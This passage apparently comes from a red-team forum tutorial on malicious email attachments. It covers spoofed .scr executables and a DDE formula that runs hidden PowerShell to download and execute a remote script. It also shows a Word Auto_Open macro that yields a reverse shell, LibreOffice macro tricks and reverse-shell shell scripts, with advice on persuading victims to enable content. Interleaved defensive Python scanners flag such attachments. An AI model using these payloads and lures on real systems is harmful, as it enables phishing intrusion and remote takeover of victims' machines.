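        off += 2 + size
    if flags["HasLinkInfo"]:
        size, = struct.unpack_from("<I", data, off)
        off += size
    info = {"show_command": SHOW_COMMAND.get(show_cmd, str(show_cmd)), "flags": flags}
    for flag, key in STRING_FIELDS:
        if not flags[flag]:
            continue
        count, = struct.unpack_from("<H", data, off)  # CountCharacters, not bytes
        off += 2
        if flags["IsUnicode"]:
            info[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[key] = data[off:off + count].decode("cp1252")
            off += count
    return info


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(info: dict) -> list:
    """Reasons a shortcut deserves a closer look."""
    reasons = []
    target = info.get("relative_path", "")
    icon = info.get("icon_location", "")
    if icon and target and _basename(icon) != _basename(target):
        reasons.append(f"icon borrowed from {_basename(icon)} but target is {_basename(target)}")
    if info["show_command"] == "SW_SHOWMINNOACTIVE" and info.get("arguments"):
        reasons.append("launches minimised with command-line arguments")
    return reasons


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_cmd: int) -> bytes:
    """Constructed minimal .lnk: header plus Unicode StringData, no ID list or LinkInfo."""
    flags = 0
    string_data = b""
    for flag, value in (("HasRelativePath", relative_path), ("HasArguments", arguments),
                        ("HasIconLocation", icon_location)):
        if value:
            flags |= 1 << LINK_FLAGS.index(flag)
            string_data += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    flags |= 1 << LINK_FLAGS.index("IsUnicode")
    header = (LNK_MAGIC + struct.pack("<II", flags, 0x20) + b"\x00" * 24   # attrs, 3 timestamps
              + struct.pack("<IIIH", 0, 0, show_cmd, 0) + b"\x00" * 10)    # size, icon idx, show, hotkey, reserved
    assert len(header) == 76
    return header + string_data


# Constructed samples: a plain Notepad shortcut and one wearing Notepad's icon.
BENIGN_LNK = build_lnk("notepad.exe", "", r"%SystemRoot%\system32\notepad.exe", 1)
LURE_LNK = build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-NoProfile -File notes.ps1", r"%SystemRoot%\system32\notepad.exe", 7)

if __name__ == "__main__":
    for lnk in (BENIGN_LNK, LURE_LNK):
        info = parse_lnk(lnk)
        print(info.get("relative_path"), "|", info.get("arguments"), "|", info["show_command"], "|", triage(info))
```

Real shortcuts usually carry a LinkTargetIDList rather than a relative path, so a production parser would also walk the ID list to recover the absolute target; the point here is that none of what the user sees (the icon) is what the file does (target, arguments, window mode).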
 

Attachments: SCR Files

SCR files are screensaver files used by Windows for energy-saving purposes. I will create a simple binary and change the extension from EXE to SCR.

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.

SCR files are screensaver files used by Windows for energy saving purposes. Screensavers are programs that execute after a configurable time of user inactivity and consists of Portable Executable (PE) files with a .scr file extension. The windows screensaver application scrnsave.scr is located in C:\Windows\System32, and C:\Windows\sysWOW64\ on 64-bit Windows systems. The screensaver settings are stored in the Registry (HKCU: Control Panel\Desktop\ ) and can also be manipulated for persistence.

We can use msfvenom, Phantom Evasion, the Veil Framework or any tool that can generate a binary payload. This is the file we will manipulate so that we can send it to our victim and have it executed.

I will use a simple payload created with msfvenom. I will save it as an EXE file, and from the attacker machine I can change the extension to .scr. We can compare both payloads: even though the extension has changed, the functionality has not been affected.

image

I will transfer these files onto our Windows box and we can see the small but very valuable difference: in the description information the EXE file is described as an Application and the SCR file as a Screensaver. This is good, as we can confuse our target into thinking this is a normal screensaver file.

image

We can see our payload running in the processes list

image

What about the SCR file?

image

Same results, but why is this? Well, .scr files are also executables on a Windows machine. We can go a bit further and try to make this a more credible file to open.

Spoofed Extension and Icon has been switched.

image

In this example I spoofed the extension and switched the icon to a more credible or safer-looking one, so the user might think this is a simple image, but in the following demo we can see that this is an executable that will connect back to our attacking machine.

Demo:

image
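The mitigation list under Spearphishing Attachment says to block .scr, .exe, .pif and .cpl by default, and the SCR demo just shown is why an extension on its own is not enough: the file is a PE whatever it is called. The following is an added example covering both passages, not part of the original post: it checks the final extension against a block list, flags document-looking double extensions, sniffs the first bytes for PE, ELF and LNK headers regardless of the name, and looks inside ZIP attachments, noting encrypted members it cannot inspect. The block list, the label strings and the sample files are constructed for illustration.

```python
"""Screen email attachments by extension and by what the bytes actually are.

Added example, not part of the original post. The block list is an assumption
and the sample attachments are constructed (a header-only "PE").
"""
import io
import zipfile

BLOCKED_EXT = {".scr", ".exe", ".pif", ".cpl", ".hta", ".lnk", ".bat", ".js", ".vbs"}
DOC_LOOKING = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
MAGIC = {
    b"MZ": "PE executable",
    b"\x7fELF": "ELF executable",
    bytes.fromhex("4c0000000114020000000000c000000000000046"): "Windows shortcut (LNK)",
}


def sniff(data: bytes):
    """Label the content by its leading bytes, ignoring the file name entirely."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return None


def extensions(name: str) -> list:
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    return ["." + p for p in parts[1:]] if len(parts) > 1 else []


def screen(name: str, data: bytes) -> list:
    """Findings for one attachment; an empty list means nothing stood out."""
    findings = []
    exts = extensions(name)
    final = exts[-1] if exts else ""
    if final in BLOCKED_EXT:
        findings.append(f"{name}: blocked extension {final}")
    if len(exts) >= 2 and exts[-2] in DOC_LOOKING:
        findings.append(f"{name}: document-looking double extension {''.join(exts[-2:])}")
    label = sniff(data)
    if label and final not in BLOCKED_EXT:
        findings.append(f"{name}: content is {label} but extension is {final or 'none'}")
    if data.startswith(b"PK\x03\x04"):
        findings.extend(screen_zip(name, data))
    return findings


def screen_zip(name: str, data: bytes) -> list:
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.flag_bits & 0x1:  # encrypted member: the gateway cannot look inside
                findings.append(f"{name}: encrypted member {info.filename} (cannot inspect)")
            elif not info.is_dir():
                findings.extend(screen(f"{name}/{info.filename}", zf.read(info)))
    return findings


def _zip(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member_name, member_data in members.items():
            zf.writestr(member_name, member_data)
    return buf.getvalue()


# Constructed samples: a header-only "PE" stands in for the msfvenom output.
FAKE_PE = b"MZ" + b"\x00" * 62
SAMPLES = {
    "payload.scr": FAKE_PE,   # the renamed EXE from the demo
    "holiday.jpg": FAKE_PE,   # spoofed extension, executable inside
    "notes.txt": b"meeting at 10\n",
    "invoice.zip": _zip({"invoice.pdf.exe": FAKE_PE, "readme.txt": b"see attached\n"}),
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(fname, "->", screen(fname, blob) or "clean")
```

Policy follows from the findings: a blocked extension or a content/extension mismatch is a drop, and an encrypted archive member is a quarantine-and-ask, since the "zip password in the email body" trick from the section above exists precisely to produce that blind spot.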
 

Attachments: Dynamic Data Exchange

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry Keys.

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via phishing campaigns or hosted Web Content, avoiding the use of Visual Basic for Applications (VBA) macros. DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The technique in this demo will use Excel; there are different procedures for the various Office products, but the syntax should be the same.

As of 2017 some products no longer support DDE, but Excel and Outlook still do by default.


We start by opening a new Excel spreadsheet and type the syntax into the formula box of cell A1.

image

In the formula box we write the following syntax. If you receive a formula error it will usually highlight where the error is located; it's a lot of trial and error, but this syntax should be simple to follow.

    =cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"<URL hidden in the original post>");'!_xlbgnm.A1

From here we need to set up our web server and our listener, so that the DDE command can download and execute our shell and the listener can catch it.

image

A simple warning will ask the user to enable the content; here our social engineering comes in handy by explaining why the user should do this.

image

Once they enable it, a second prompt will show what is trying to be executed; if we manage to get the user past this, we should be doing well.

image

They click Yes and we see our attacking machine receive a connection.

image

image
 

Attachments: Macros​

Macros are a series of instructions to automate tasks; the scripting language behind them also helps adversaries automate various attacks.

Let me explain a little about macros: they are a series of commands and instructions that you group together as a single command to accomplish a task automatically. In versions of Windows 2007 and newer, you can bundle tasks you do often into a macro.

These macros also help red teamers execute code or accomplish a command; since this comes from a legitimate source, MS Office, they pass undetected by antivirus. Of course, nowadays AV is getting more sophisticated and can actually detect malicious tasks that macros shouldn't be executing; a way to avoid this is by adding obfuscation to the file. Macros can also execute code such as VB (Visual Basic).

Example

In this example I will be using two tools: Unicorn, from Dave Kennedy at TrustedSec, and a simple PowerShell reverse shell. By combining these tools I will be able to create a macro payload that gains me access to the target machine when executed on the victim machine.

Unicorn Menu

image

From the payloads offered by Unicorn I will use the Custom PS1 Attack Example with the macro included; from here it will be simple to combine the two and create a macro.

image

A new file will be created (powershell_attack.txt); when viewing this file we will see the VBA code created, which we copy and paste into our Word document.

image

We move to our Sample machine running Windows and Create a New Word Document.

To enable this feature we need to go to the Options menu, then Customize Ribbon, and select the Developer option. From there we can create a macro.

image

Create a new macro and name it Auto_Open

image

In the next window we copy the entire code from our powershell_attack.txt file and save it.

image

We continue and save the file; this is what will need to be attached and sent to our target. Make sure to choose the Macro-Enabled Document format.

image

From here we go back to our attacking machine, start our listener and wait for a shell connection back. Once the user opens the document they will receive an Application Error; no worries, this behavior is intended, making them think that the document is meant for "older" versions of the file.

image
 

Attachments: Macros - Linux​

Macros can be utilized on Linux as well. Since there is no official support for running Microsoft Office on Linux, we have to work with the alternative suite, LibreOffice, which allows macros as well with its own scripting language
This link is hidden for visitors. Please Log in or register now.
Some advantages of this method of initial access are that there is no MOTW and that setting up macro execution is quite simple. We don't have access to the Win32 API or any other implementations used with Windows, so we will work with what we have; in the following example I scripted it to execute the calculator on Linux


Code:
Sub Main
Shell("gnome-calculator")
End Sub


With this code the calculator will launch when the macro is executed. To implement Open Document execution, so the macro runs as soon as the document is opened, follow these steps:

Tools > Customize > Events > Open Document

Verify the window looks similar to the one below to confirm that the macro you are working with is actually selected to run on open

image

Below is a small demonstration that the macro has been executed successfully

image

Now, unfortunately, this method works because the macros are stored on my local machine and that's where they execute from; when sending the document to the user, the macro needs to be stored in the file, not in the local library

image

And macros by default are on High security


image

The only option is to run these files from a Trusted Location

1image.png


And then social engineer the user into executing the macros, since there is no "AutoOpen" feature in LibreOffice.

OLE Objects​

Now with OLE Objects we can utilize a technique called "Mouse Over Object": we select our macro embedded in the document and assign it the action. In this scenario there is no need for a Trusted Location. In this example I used a formula, which is the smallest object I could quickly find:

image

Then right-click and assign the action

image

And when the user hovers over the OLE object we gain execution, as seen in the demo below:

Macro-Linux-OLE.gif
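As an added example (not part of the original post), here is a defender-side triage script that covers the three attachment types demonstrated above: the Excel DDE formula, the Word VBA macro and the LibreOffice Basic macro. It assumes the documents are standard OOXML/ODF ZIP packages, where a saved DDE link lives in a `ddeLink` part and Basic libraries sit under `Basic/`; the sample workbook it scans is constructed inline.

```python
"""Added example (not part of the original post): a defender-side triage check for
Office attachments. Both OOXML (.docx/.xlsx/.xlsm) and ODF (.odt/.ods) files are
ZIP packages, so one pass over the members can flag the three delivery mechanisms
shown above: Excel DDE links, VBA macro projects and LibreOffice Basic macros.
The sample package is constructed in memory so the script runs offline."""
import io
import re
import zipfile

# =application|'topic'!item, the formula form used above (e.g. =cmd|'/c ...'!_xlbgnm.A1).
DDE_FORMULA = re.compile(r"=\s*[\w.\\:-]+\|'", re.IGNORECASE)
# Saved workbooks store the same link as a <ddeLink ddeService=".." ddeTopic=".."/> part.
DDE_LINK = re.compile(r'<(?:\w+:)?ddeLink\b[^>]*ddeService="([^"]*)"[^>]*ddeTopic="([^"]*)"', re.IGNORECASE)


def scan_office_package(data: bytes) -> list[str]:
    """Return one finding string per suspicious member; an empty list means nothing flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.endswith("vbaproject.bin"):          # Word/Excel/PowerPoint VBA storage
                findings.append(f"VBA macro project: {name}")
            elif lower.startswith("basic/") and lower.count("/") == 2 and lower.endswith(".xml"):
                findings.append(f"LibreOffice Basic module: {name}")  # Basic/<Library>/<Module>.xml
            if lower.endswith(".xml"):
                text = zf.read(name).decode("utf-8", errors="replace")
                for m in DDE_LINK.finditer(text):
                    findings.append(f"DDE link in {name}: service={m.group(1)!r} topic={m.group(2)!r}")
                for m in DDE_FORMULA.finditer(text):
                    findings.append(f"DDE-style formula in {name}: {text[m.start():m.start() + 40]!r}")
    return findings


def build_sample() -> bytes:
    """Constructed minimal workbook carrying a DDE external link and a VBA project stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/worksheets/sheet1.xml",
                    '<worksheet><sheetData><row r="1"><c r="A1"><f>[1]!_xlbgnm.A1</f></c></row></sheetData></worksheet>')
        zf.writestr("xl/externalLinks/externalLink1.xml",
                    '<externalLink><ddeLink ddeService="cmd" ddeTopic="/c calc.exe"/></externalLink>')
        zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder, not a real project")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_office_package(build_sample()):
        print(finding)
```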
 

Attachments: Scripting Files​

Scripting files are commonly used in Linux distributions for things such as setting up an operating system to company policies, automating tasks, development, monitoring and logging, managing user permissions and much more. A sample SH script file that just runs the calculator:

Code:
#!/bin/bash
 
# Print welcome message
echo "========================="
echo "Hello to my first script!!"
echo "========================="
# Launch GNOME Calculator
gnome-calculator

The previous script would print out a message and then finally proceed to execute the calculator app, but we can also call a simple reverse shell; we can utilize the pentestmonkey one-liners for this

image

Our Shell

image

As seen here, we gain a reverse shell connection back to our attacking host, but do realize this requires extra social engineering steps, as Linux considers everything a file until you tell it that it's something else, like a script or an executable, so the user needs to perform a setup step before executing.



Now, in my testing I've noticed that if files come inside a container their execution property isn't removed, just as when working with a Windows OS. Take notice in the image below of an SH script that has execution properties from another Linux machine
image

Execution properties have been removed; this applies to files downloaded from browsers or using LOLBINs, but if the file is placed inside a container, let's say a ZIP container, the execution properties aren't removed

image
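As an added example (not part of the original post), a check for the ZIP behaviour described above: it lists the archive members that still carry a Unix execute bit and re-packs the archive with those bits cleared, so an extracted script needs a deliberate chmod before it will run. The archive is constructed inline.

```python
"""Added example (not part of the original post): inspect a ZIP archive for members
that carry the Unix execute bit, which survives inside the container as described
above even though a browser download would normally strip it, and produce a copy
of the archive with those bits cleared. The archive is constructed in memory."""
import io
import stat
import zipfile

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def executable_members(data: bytes) -> list[tuple[str, str]]:
    """Return (member name, symbolic mode) for every entry with any execute bit set.

    zipfile keeps the Unix mode in the high 16 bits of external_attr; entries written
    by non-Unix tools have 0 there and are therefore reported as non-executable."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if mode & EXEC_BITS:
                flagged.append((info.filename, stat.filemode(mode)))
    return flagged


def strip_exec_bits(data: bytes) -> bytes:
    """Re-pack the archive with every member's execute bits cleared, keeping the
    file type bits and the low 16 MS-DOS attribute bits untouched."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src:
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
            for info in src.infolist():
                mode = (info.external_attr >> 16) & ~EXEC_BITS
                info.external_attr = (mode << 16) | (info.external_attr & 0xFFFF)
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def build_sample() -> bytes:
    """Constructed archive: one script packed as mode 0755, one text file as 0644."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, mode, body in (("setup.sh", 0o755, "#!/bin/bash\ngnome-calculator\n"),
                                 ("README.txt", 0o644, "constructed sample\n")):
            info = zipfile.ZipInfo(name)
            info.external_attr = (stat.S_IFREG | mode) << 16  # how zip/unzip store Unix perms
            zf.writestr(info, body)
    return buf.getvalue()


if __name__ == "__main__":
    print(executable_members(build_sample()))            # [('setup.sh', '-rwxr-xr-x')]
    print(executable_members(strip_exec_bits(build_sample())))  # []
```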
 